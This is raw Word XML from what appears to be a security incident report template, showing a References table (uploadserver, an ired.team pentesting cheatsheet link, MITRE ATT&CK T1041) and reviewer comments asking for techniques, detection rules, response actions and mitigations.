    <w:p w14:paraId="06AB10F2" w14:textId="77777777" w:rsidR="00B8236E" w:rsidRPr="00D01BC9" w:rsidRDefault="00B8236E" w:rsidP="00B8236E">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6BB5CE5B" w14:textId="77777777" w:rsidR="00B8236E" w:rsidRPr="004D5913" w:rsidRDefault="00B8236E" w:rsidP="00B8236E">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="62" w:name="_Toc220896711"/>
      <w:commentRangeStart w:id="63"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>References</w:t>
      </w:r>
      <w:bookmarkEnd w:id="62"/>
      <w:commentRangeEnd w:id="63"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentReference"/>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:commentReference w:id="63"/>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="3823"/>
        <w:gridCol w:w="5359"/>
      </w:tblGrid>
      <w:tr w:rsidR="00B8236E" w:rsidRPr="004D5913" w14:paraId="2EA84348" w14:textId="77777777" w:rsidTr="001B4A08">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3823" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="38BA6CF9" w14:textId="77777777" w:rsidR="00B8236E" w:rsidRPr="004D5913" w:rsidRDefault="00B8236E" w:rsidP="001B4A08">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:b/>
                <w:u w:val="single"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:b/>
                <w:u w:val="single"/>
              </w:rPr>
              <w:t>Description of Reference</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5359" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="62F3664B" w14:textId="77777777" w:rsidR="00B8236E" w:rsidRPr="004D5913" w:rsidRDefault="00B8236E" w:rsidP="001B4A08">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:b/>
                <w:u w:val="single"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:b/>
                <w:u w:val="single"/>
              </w:rPr>
              <w:t>URL</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D51E26" w:rsidRPr="004D5913" w14:paraId="4C406D61" w14:textId="77777777" w:rsidTr="001B4A08">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3823" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="09C5910C" w14:textId="136914EA" w:rsidR="00D51E26" w:rsidRPr="007134C9" w:rsidRDefault="00D51E26" w:rsidP="001B4A08">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:bCs/>
              </w:rPr>
              <w:t>uploadserver</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5359" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7B5A24BD" w14:textId="784407DA" w:rsidR="00D51E26" w:rsidRPr="00D51E26" w:rsidRDefault="00D51E26" w:rsidP="001B4A08">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:bCs/>
                <w:u w:val="single"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="rId64" w:history="1">
              <w:r>
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                  <w:bCs/>
                </w:rPr>
                <w:t>https://pypi.org/project/uploadserver/</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B8236E" w:rsidRPr="004D5913" w14:paraId="66B366BE" w14:textId="77777777" w:rsidTr="001B4A08">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3823" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0829FA8D" w14:textId="7476F7E5" w:rsidR="00B8236E" w:rsidRPr="00D01BC9" w:rsidRDefault="000F2369" w:rsidP="001B4A08">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Pentesting Cheatsheets | Red Team Notes</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5359" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4D7D9B16" w14:textId="3209143D" w:rsidR="00B8236E" w:rsidRPr="00D01BC9" w:rsidRDefault="00B75F40" w:rsidP="001B4A08">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="rId65" w:anchor="uploading-posting-files-through-www-upload-forms" w:history="1">
              <w:r>
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                </w:rPr>
                <w:t>https://www.ired.team/offensive-security-experiments/offensive-security-cheetsheets#uploading-posting-files-through-www-upload-forms</w:t>
              </w:r>
            </w:hyperlink>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007463D5" w:rsidRPr="004D5913" w14:paraId="667905A3" w14:textId="77777777" w:rsidTr="001B4A08">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3823" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="0B79795E" w14:textId="3FCA6551" w:rsidR="007463D5" w:rsidRPr="00D01BC9" w:rsidRDefault="007463D5" w:rsidP="007463D5">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Exfiltration Over C2 Channel MITRE ATT&amp;CK</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5359" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4E31C5AB" w14:textId="30EA85BC" w:rsidR="007463D5" w:rsidRPr="00D01BC9" w:rsidRDefault="00132BB0" w:rsidP="007463D5">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="rId66" w:history="1">
              <w:r>
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                </w:rPr>
                <w:t>https://attack.mitre.org/techniques/T1041/</w:t>
              </w:r>
            </w:hyperlink>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="27F4ED4E" w14:textId="59578AB4" w:rsidR="240C871B" w:rsidRDefault="240C871B" w:rsidP="2BFA4357">
      <w:pPr>
        <w:widowControl/>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="240C871B" w:rsidSect="001D70A9">
      <w:footerReference w:type="default" r:id="rId67"/>
      <w:endnotePr>
        <w:numFmt w:val="decimal"/>
      </w:endnotePr>
      <w:pgSz w:w="11909" w:h="16834"/>
      <w:pgMar w:top="864" w:right="1277" w:bottom="792" w:left="1440" w:header="709" w:footer="709" w:gutter="0"/>
      <w:cols w:space="709"/>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744F3463" w14:textId="77777777" w:rsidR="00CB4373" w:rsidRDefault="00CB4373" w:rsidP="00CB4373">
      <w:pPr>
        <w:pStyle w:val="CommentText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentReference"/>
        </w:rPr>
        <w:annotationRef/>
      </w:r>
      <w:r>
        <w:t>Do have some document updates so that we know the report has gone through review amongst your own teammates.</w:t>
      </w:r>
    </w:p>
  </w:comment>
  <w:comment w:id="2" w:author="Author" w:initials="A">
    <w:p w14:paraId="1D99AF4E" w14:textId="77777777" w:rsidR="00CB4373" w:rsidRDefault="00CB4373" w:rsidP="00CB4373">
      <w:pPr>
        <w:pStyle w:val="CommentText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentReference"/>
        </w:rPr>
        <w:annotationRef/>
      </w:r>
      <w:r>
        <w:t>Ensure to update this table of contents before you PDF generate the report.</w:t>
      </w:r>
    </w:p>
  </w:comment>
  <w:comment w:id="5" w:author="Author" w:initials="A">
    <w:p w14:paraId="2BE70832" w14:textId="77777777" w:rsidR="00CB4373" w:rsidRDefault="00CB4373" w:rsidP="00CB4373">
      <w:pPr>
        <w:pStyle w:val="CommentText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentReference"/>
        </w:rPr>
        <w:annotationRef/>
      </w:r>
      <w:r>
        <w:t>Ensure to fill this table up.</w:t>
      </w:r>
    </w:p>
  </w:comment>
  <w:comment w:id="10" w:author="Author" w:initials="A">
    <w:p w14:paraId="28F4AC1E" w14:textId="77777777" w:rsidR="00D01BC9" w:rsidRDefault="00D01BC9" w:rsidP="00D01BC9">
      <w:pPr>
        <w:pStyle w:val="CommentText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentReference"/>
        </w:rPr>
        <w:annotationRef/>
      </w:r>
      <w:r>
        <w:t>List out depicted technique(s) based on this one attack (can be more than 1 technique by the way)</w:t>
      </w:r>
    </w:p>
  </w:comment>
  <w:comment w:id="12" w:author="Author" w:initials="A">
    <w:p w14:paraId="198BCCD0" w14:textId="77777777" w:rsidR="00ED5F9B" w:rsidRDefault="00ED5F9B" w:rsidP="00ED5F9B">
      <w:pPr>
        <w:pStyle w:val="CommentText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentReference"/>
        </w:rPr>
        <w:annotationRef/>
      </w:r>
      <w:r>
        <w:t>Document the steps taken for the technique demonstrated.</w:t>
      </w:r>
    </w:p>
  </w:comment>
  <w:comment w:id="14" w:author="Author" w:initials="A">
    <w:p w14:paraId="4D7BD5DC" w14:textId="57BEDCEA" w:rsidR="00D01BC9" w:rsidRDefault="00D01BC9" w:rsidP="00D01BC9">
      <w:pPr>
        <w:pStyle w:val="CommentText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentReference"/>
        </w:rPr>
        <w:annotationRef/>
      </w:r>
      <w:r>
        <w:t>Detection rules (either Wazuh or IDS, or even both). And do a short explanation what does each detection rule do along with the relevance of how it helps to detect the attack.</w:t>
      </w:r>
    </w:p>
  </w:comment>
  <w:comment w:id="16" w:author="Author" w:initials="A">
    <w:p w14:paraId="22C84665" w14:textId="77777777" w:rsidR="00D01BC9" w:rsidRDefault="00D01BC9" w:rsidP="00D01BC9">
      <w:pPr>
        <w:pStyle w:val="CommentText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentReference"/>
        </w:rPr>
        <w:annotationRef/>
      </w:r>
      <w:r>
        <w:t>Actions to be performed by the analyst after the incident has occurred.</w:t>
      </w:r>
    </w:p>
  </w:comment>
  <w:comment w:id="18" w:author="Author" w:initials="A">
    <w:p w14:paraId="784152A0" w14:textId="77777777" w:rsidR="008B75AA" w:rsidRDefault="008B75AA" w:rsidP="008B75AA">
      <w:pPr>
        <w:pStyle w:val="CommentText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentReference"/>
        </w:rPr>
        <w:annotationRef/>
      </w:r>
      <w:r>
        <w:t>Long term security controls to mitigate (or even prevent) attacks if possible, moving forward.</w:t>
      </w:r>
    </w:p>
  </w:comment>
  <w:comment w:id="20" w:author="Author" w:initials="A">
    <w:p w14:paraId="7D0BBE54" w14:textId="77777777" w:rsidR="00D01BC9" w:rsidRDefault="00D01BC9" w:rsidP="00D01BC9">
      <w:pPr>
        <w:pStyle w:val="CommentText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentReference"/>
        </w:rPr>
        <w:annotationRef/>
      </w:r>
      <w:r>
        <w:t>References used for the writeup (can be links to the MITRE ATT&amp;CK techniques)</w:t>
      </w:r>
    </w:p>
  </w:comment>
  <w:comment w:id="23" w:author="Author" w:initials="A">
    <w:p w14:paraId="166B9A61" w14:textId="77777777" w:rsidR="00500AD9" w:rsidRDefault="00500AD9" w:rsidP="00500AD9">
      <w:pPr>
        <w:pStyle w:val="CommentText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentReference"/>
        </w:rPr>
        <w:annotationRef/>
      </w:r>
      <w:r>
        <w:t>List out depicted technique(s) based on this one attack (can be more than 1 technique by the way)</w:t>
      </w:r>
    </w:p>
  </w:comment>
  <w:comment w:id="25" w:author="Author" w:initials="A">
    <w:p w14:paraId="087A3724" w14:textId="77777777" w:rsidR="00ED5F9B" w:rsidRDefault="00ED5F9B" w:rsidP="00ED5F9B">
      <w:pPr>
        <w:pStyle w:val="CommentText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentReference"/>
        </w:rPr>
        <w:annotationRef/>
      </w:r>
      <w:r>
        <w:t>Document the steps taken for the technique demonstrated.</w:t>
      </w:r>
    </w:p>
  </w:comment>
  <w:comment w:id="27" w:author="Author" w:initials="A">
    <w:p w14:paraId="390E2845" w14:textId="77777777" w:rsidR="00500AD9" w:rsidRDefault="00500AD9" w:rsidP="00500AD9">
      <w:pPr>
        <w:pStyle w:val="CommentText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentReference"/>
        </w:rPr>
        <w:annotationRef/>
      </w:r>
      <w:r>
        <w:t>Detection rules (either Wazuh or IDS, or even both). And do a short explanation what does each detection rule do along with the relevance of how it helps to detect the attack.</w:t>
      </w:r>
    </w:p>
  </w:comment>
  <w:comment w:id="29" w:author="Author" w:initials="A">
    <w:p w14:paraId="6F2BBF46" w14:textId="77777777" w:rsidR="00500AD9" w:rsidRDefault="00500AD9" w:rsidP="00500AD9">
      <w:pPr>
        <w:pStyle w:val="CommentText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentReference"/>
        </w:rPr>
        <w:annotationRef/>
      </w:r>
      <w:r>
        <w:t>Actions to be performed by the analyst after the incident has occurred.</w:t>
      </w:r>
    </w:p>
  </w:comment>
  <w:comment w:id="31" w:author="Author" w:initials="A">
    <w:p w14:paraId="7C55C2F5" w14:textId="77777777" w:rsidR="00500AD9" w:rsidRDefault="00500AD9" w:rsidP="00500AD9">
      <w:pPr>
        <w:pStyle w:val="CommentText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentReference"/>
        </w:rPr>
        <w:annotationRef/>
      </w:r>
      <w:r>
        <w:t>Long term security controls to mitigate (or even prevent) attacks if possible, moving forward.</w:t>
      </w:r>
    </w:p>
  </w:comment>
  <w:comment w:id="33" w:author="Author" w:initials="A">
    <w:p w14:paraId="01252BD1" w14:textId="77777777" w:rsidR="00500AD9" w:rsidRDefault="00500AD9" w:rsidP="00500AD9">
      <w:pPr>
        <w:pStyle w:val="CommentText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentReference"/>
        </w:rPr>
        <w:annotationRef/>
      </w:r>
      <w:r>
        <w:t>References used for the writeup (can be links to the MITRE ATT&amp;CK techniques)</w:t>
      </w:r>
    </w:p>
  </w:comment>
  <w:comment w:id="36" w:author="Author" w:initials="A">
    <w:p w14:paraId="6D1C683B" w14:textId="77777777" w:rsidR="00B8236E" w:rsidRDefault="00B8236E" w:rsidP="00B8236E">
      <w:pPr>
        <w:pStyle w:val="CommentText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentReference"/>
        </w:rPr>
        <w:annotationRef/>
      </w:r>
      <w:r>
        <w:t>List out depicted technique(s) based on this one attack (can be more than 1 technique by the way)</w:t>
      </w:r>
    </w:p>
  </w:comment>
  <w:comment w:id="38" w:author="Author" w:initials="A">
    <w:p w14:paraId="6F2DA8AF" w14:textId="77777777" w:rsidR="00ED5F9B" w:rsidRDefault="00ED5F9B" w:rsidP="00ED5F9B">
      <w:pPr>
        <w:pStyle w:val="CommentText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentReference"/>
        </w:rPr>
        <w:annotationRef/>
      </w:r>
      <w:r>
        <w:t>Document the steps taken for the technique demonstrated.</w:t>
      </w:r>
    </w:p>
  </w:comment>
  <w:comment w:id="40" w:author="Author" w:initials="A">
    <w:p w14:paraId="75D7806D" w14:textId="77777777" w:rsidR="00B8236E" w:rsidRDefault="00B8236E" w:rsidP="00B8236E">
      <w:pPr>
        <w:pStyle w:val="CommentText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentReference"/>
        </w:rPr>
        <w:annotationRef/>
      </w:r>
      <w:r>
        <w:t>Detection rules (either Wazuh or IDS, or even both). And do a short explanation what does each detection rule do along with the relevance of how it helps to detect the attack.</w:t>
      </w:r>
    </w:p>
  </w:comment>
  <w:comment w:id="45" w:author="Author" w:initials="A">
    <w:p w14:paraId="6766C7DC" w14:textId="77777777" w:rsidR="00B8236E" w:rsidRDefault="00B8236E" w:rsidP="00B8236E">
      <w:pPr>
        <w:pStyle w:val="CommentText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentReference"/>
        </w:rPr>
        <w:annotationRef/>
      </w:r>
      <w:r>
        <w:t>Actions to be performed by the analyst after the incident has occurred.</w:t>
      </w:r>
    </w:p>
  </w:comment>
  <w:comment w:id="50" w:author="Author" w:initials="A">
    <w:p w14:paraId="5737B409" w14:textId="77777777" w:rsidR="00B8236E" w:rsidRDefault="00B8236E" w:rsidP="00B8236E">
      <w:pPr>
        <w:pStyle w:val="CommentText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentReference"/>
        </w:rPr>
        <w:annotationRef/>
      </w:r>
      <w:r>
        <w:t>References used for the writeup (can be links to the MITRE ATT&amp;CK techniques)</w:t>
      </w:r>
    </w:p>
  </w:comment>
  <w:comment w:id="53" w:author="Author" w:initials="A">
    <w:p w14:paraId="75DE2BA1" w14:textId="77777777" w:rsidR="00B8236E" w:rsidRDefault="00B8236E" w:rsidP="00B8236E">
      <w:pPr>
        <w:pStyle w:val="CommentText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentReference"/>
        </w:rPr>
        <w:annotationRef/>
      </w:r>
      <w:r>
        <w:t>List out depicted technique(s) based on this one attack (can be more than 1 technique by the way)</w:t>
      </w:r>
    </w:p>
  </w:comment>
  <w:comment w:id="55" w:author="Author" w:initials="A">
    <w:p w14:paraId="4C222807" w14:textId="77777777" w:rsidR="00ED5F9B" w:rsidRDefault="00ED5F9B" w:rsidP="00ED5F9B">
      <w:pPr>
        <w:pStyle w:val="CommentText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentReference"/>
        </w:rPr>
        <w:annotationRef/>
      </w:r>
      <w:r>
        <w:t>Document the steps taken for the technique demonstrated.</w:t>
      </w:r>
    </w:p>
  </w:comment>
  <w:comment w:id="57" w:author="Author" w:initials="A">
    <w:p w14:paraId="673CAA8F" w14:textId="77777777" w:rsidR="00B8236E" w:rsidRDefault="00B8236E" w:rsidP="00B8236E">
      <w:pPr>
        <w:pStyle w:val="CommentText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentReference"/>
        </w:rPr>
        <w:annotationRef/>
      </w:r>
      <w:r>
        <w:t>Detection rules (either Wazuh or IDS, or even both). And do a short explanation what does each detection rule do along with the relevance of how it helps to detect the attack.</w:t>
      </w:r>
    </w:p>
  </w:comment>
  <w:comment w:id="59" w:author="Author" w:initials="A">
    <w:p w14:paraId="1D681F85" w14:textId="77777777" w:rsidR="00B8236E" w:rsidRDefault="00B8236E" w:rsidP="00B8236E">
      <w:pPr>
        <w:pStyle w:val="CommentText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentReference"/>
        </w:rPr>
        <w:annotationRef/>
      </w:r>
      <w:r>
        <w:t>Actions to be performed by the analyst after the incident has occurred.</w:t>
      </w:r>
    </w:p>
  </w:comment>
  <w:comment w:id="61" w:author="Author" w:initials="A">
    <w:p w14:paraId="3E8DF68D" w14:textId="77777777" w:rsidR="00B8236E" w:rsidRDefault="00B8236E" w:rsidP="00B8236E">
      <w:pPr>
        <w:pStyle w:val="CommentText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentReference"/>
        </w:rPr>
        <w:annotationRef/>
      </w:r>
      <w:r>
        <w:t>Long term security controls to mitigate (or even prevent) attacks if possible, moving forward.</w:t>
      </w:r>
    </w:p>
  </w:comment>
  <w:comment w:id="63" w:author="Author" w:initials="A">
    <w:p w14:paraId="673852C4" w14:textId="77777777" w:rsidR="00B8236E" w:rsidRDefault="00B8236E" w:rsidP="00B8236E">
      <w:pPr>
        <w:pStyle w:val="CommentText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentReference"/>
        </w:rPr>
        <w:annotationRef/>
      </w:r>
      <w:r>
        <w:t>References used for the writeup (can be links to the MITRE ATT&amp;CK techniques)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4F3463" w15:done="0"/>
  <w15:commentEx w15:paraId="1D99AF4E" w15:done="1"/>
  <w15:commentEx w15:paraId="2BE70832" w15:done="1"/>
  <w15:commentEx w15:paraId="28F4AC1E" w15:done="1"/>
  <w15:commentEx w15:paraId="198BCCD0" w15:done="1"/>
  <w15:commentEx w15:paraId="4D7BD5DC" w15:done="1"/>
  <w15:commentEx w15:paraId="22C84665" w15:done="1"/>
  <w15:commentEx w15:paraId="784152A0" w15:done="1"/>
  <w15:commentEx w15:paraId="7D0BBE54" w15:done="1"/>
  <w15:commentEx w15:paraId="166B9A61" w15:done="1"/>
  <w15:commentEx w15:paraId="087A3724" w15:done="1"/>
  <w15:commentEx w15:paraId="390E2845" w15:done="1"/>
  <w15:commentEx w15:paraId="6F2BBF46" w15:done="1"/>
  <w15:commentEx w15:paraId="7C55C2F5" w15:done="1"/>
  <w15:commentEx w15:paraId="01252BD1" w15:done="1"/>
  <w15:commentEx w15:paraId="6D1C683B" w15:done="1"/>
  <w15:commentEx w15:paraId="6F2DA8AF" w15:done="1"/>
  <w15:commentEx w15:paraId="75D7806D" w15:done="1"/>
  <w15:commentEx w15:paraId="6766C7DC" w15:done="1"/>
  <w15:commentEx w15:paraId="5737B409" w15:done="1"/>
  <w15:commentEx w15:paraId="75DE2BA1" w15:done="1"/>
  <w15:commentEx w15:paraId="4C222807" w15:done="1"/>
  <w15:commentEx w15:paraId="673CAA8F" w15:done="1"/>
  <w15:commentEx w15:paraId="1D681F85" w15:done="1"/>
  <w15:commentEx w15:paraId="3E8DF68D" w15:done="1"/>
  <w15:commentEx w15:paraId="673852C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4F3463" w16cid:durableId="128AFC0D"/>
  <w16cid:commentId w16cid:paraId="1D99AF4E" w16cid:durableId="648F370A"/>
  <w16cid:commentId w16cid:paraId="2BE70832" w16cid:durableId="63EAA8EF"/>
  <w16cid:commentId w16cid:paraId="28F4AC1E" w16cid:durableId="51C93428"/>
  <w16cid:commentId w16cid:paraId="198BCCD0" w16cid:durableId="57D3F781"/>
  <w16cid:commentId w16cid:paraId="4D7BD5DC" w16cid:durableId="45F1441B"/>
  <w16cid:commentId w16cid:paraId="22C84665" w16cid:durableId="1C25F225"/>
  <w16cid:commentId w16cid:paraId="784152A0" w16cid:durableId="44BFE053"/>
  <w16cid:commentId w16cid:paraId="7D0BBE54" w16cid:durableId="006EEC90"/>
  <w16cid:commentId w16cid:paraId="166B9A61" w16cid:durableId="058A5F7F"/>
  <w16cid:commentId w16cid:paraId="087A3724" w16cid:durableId="7D09508D"/>
  <w16cid:commentId w16cid:paraId="390E2845" w16cid:durableId="6F4E1536"/>
  <w16cid:commentId w16cid:paraId="6F2BBF46" w16cid:durableId="22BCC624"/>
  <w16cid:commentId w16cid:paraId="7C55C2F5" w16cid:durableId="69507592"/>
  <w16cid:commentId w16cid:paraId="01252BD1" w16cid:durableId="00D96676"/>
  <w16cid:commentId w16cid:paraId="6D1C683B" w16cid:durableId="4D9D3F37"/>
  <w16cid:commentId w16cid:paraId="6F2DA8AF" w16cid:durableId="41DACEDA"/>
  <w16cid:commentId w16cid:paraId="75D7806D" w16cid:durableId="73C1CB08"/>
  <w16cid:commentId w16cid:paraId="6766C7DC" w16cid:durableId="5EFB4016"/>
  <w16cid:commentId w16cid:paraId="5737B409" w16cid:durableId="03A2F0F5"/>
  <w16cid:commentId w16cid:paraId="75DE2BA1" w16cid:durableId="419E5C2B"/>
  <w16cid:commentId w16cid:paraId="4C222807" w16cid:durableId="23AE1DAA"/>
  <w16cid:commentId w16cid:paraId="673CAA8F" w16cid:durableId="38A0331A"/>
  <w16cid:commentId w16cid:paraId="1D681F85" w16cid:durableId="2C882FFA"/>
  <w16cid:commentId w16cid:paraId="3E8DF68D" w16cid:durableId="571BC517"/>
  <w16cid:commentId w16cid:paraId="673852C4" w16cid:durableId="120DED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7C160" w14:textId="77777777" w:rsidR="0036631C" w:rsidRDefault="0036631C">
      <w:pPr>
        <w:spacing w:line="20" w:lineRule="exact"/>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="2340DBBF" w14:textId="77777777" w:rsidR="0036631C" w:rsidRDefault="0036631C">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationNotice" w:id="1">
    <w:p w14:paraId="1319A8E1" w14:textId="77777777" w:rsidR="0036631C" w:rsidRDefault="0036631C">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>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 PL UMing HK">
    <w:charset w:val="00"/>
    <w:family w:val="modern"/>
    <w:pitch w:val="fixed"/>
  </w:font>
  <w:font w:name="FreeSan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Yu Mincho">
    <w:altName w:val="Yu Gothic"/>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C637" w14:textId="77777777" w:rsidR="00C07D0E" w:rsidRPr="009D0F8B" w:rsidRDefault="00C07D0E" w:rsidP="008905B7">
    <w:pPr>
      <w:pStyle w:val="Footer"/>
      <w:rPr>
        <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
        <w:sz w:val="16"/>
      </w:rPr>
    </w:pPr>
    <w:r w:rsidRPr="00186075">
      <w:rPr>
        <w:rFonts w:ascii="SimSun" w:hAnsi="SimSun" w:hint="eastAsia"/>
        <w:sz w:val="16"/>
        <w:lang w:eastAsia="zh-CN"/>
      </w:rPr>
      <w:t xml:space="preserve"> </w:t>
    </w:r>
    <w:r w:rsidRPr="00186075">
      <w:rPr>
        <w:rFonts w:ascii="SimSun" w:hAnsi="SimSun" w:hint="eastAsia"/>
        <w:sz w:val="16"/>
        <w:lang w:eastAsia="zh-CN"/>
      </w:rPr>
      <w:tab/>
    </w:r>
